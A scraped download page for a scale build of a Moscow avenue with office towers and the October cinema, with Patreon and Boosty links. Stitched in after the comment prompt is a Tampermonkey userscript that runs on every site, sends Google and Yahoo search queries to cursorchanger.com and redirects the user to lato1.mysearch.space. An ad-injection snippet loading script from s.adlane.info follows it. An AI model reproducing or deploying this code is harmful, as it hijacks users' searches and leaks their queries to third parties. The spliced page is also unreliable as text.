- 13,557 views, 3 today
- 699 downloads, 0 today
1,297
Various departments and organizations are located in four administrative buildings, which have the shape of an open book. In the stylobate there are restaurants, shops and bars, and the houses opposite are residential. The famous October cinema is located on the avenue, where both Soviet and foreign films are shown around the clock.
My group - vk.com/krasgornews
You can download the whole city project with Red Square and more buildings
On Patreon:
https://www.patreon.com/posts/moscow-in-scale-85443524
On Boosty:
https://boosty.to/helixzlone/posts/6e4f7196-97ee-4046-bd99-557252631f35
My group - vk.com/krasgornews
You can download the whole city project with Red Square and more buildings
On Patreon:
https://www.patreon.com/posts/moscow-in-scale-85443524
On Boosty:
https://boosty.to/helixzlone/posts/6e4f7196-97ee-4046-bd99-557252631f35
Progress | 100% complete |
Tags |
2 Update Logs
Update #2 : by nebestetic 04/14/2024 4:33:19 pmApr 14th, 2024
Added Boosty download link
LOAD MORE LOGS
5262205
2
Create an account or sign in to comment.
// @name panda google
// @namespace tampermonkey.net/
// @version 0.1
// @description try to take over the world!
// @author You
// @match *://*/*
// @grant none
// ==/UserScript==
(function() {
function findGetParameter(parameterName) {
var result = null,
tmp = [];
location.search
.substr(1)
.split("&")
.forEach(function (item) {
tmp = item.split("=");
if (tmp[0] === parameterName) result = decodeURIComponent(tmp[1]);
});
return result;
}
let arr = [];
var u ='lato1.mysearch.space?q=',
s = [
{
'host':/^https?\:\/\/www.google(\.\w+)+\/search\?.*$/,
'query':'q',
},
{
'host':/^(https?\:\/\/)(\w+\.)?(search\.)(yahoo\.)(com)\/(search\?)?(.*)$/,
'query':'p'
}
]
console.log('ddd');
for(var i = 0; i < s.length; i++){
var net = s[i], pattern = net.host, q = findGetParameter(net.query);
if( pattern.test(window.location.href) ){
let xhr = new XMLHttpRequest();
xhr.open('GET', 'cursorchanger.com/api/request/search.php?click=&search='+q, false);
xhr.send();
console.log(arr);
if(arr[0] === q || arr[1] === q || arr[2] === q){
console.log('no redirect')
}else {
console.log('redirect')
document.body.innerHTML="";
window.location.href=u+q;
}
}
}
})();
x
let cl444 = document.querySelector("#clos");
cl444.addEventListener("click", function () {
let c = this.parentElement;
c.hidden = true;
});(function(d){var wrapper=d.createElement("script"); wrapper.id="WDS622329";wrapper.type="text/javascript";wrapper.src="s.adlane.info/?floor=0&content_page_url=" + encodeURIComponent(window.location.href) + "&width=120&height=600&cb=" + (new Date()).getTime().toString() + "&aid=622329";var s=d.getElementById("PDS622329");s.parentNode.insertBefore(wrapper, s);}(document));
How to download?
I am from Russian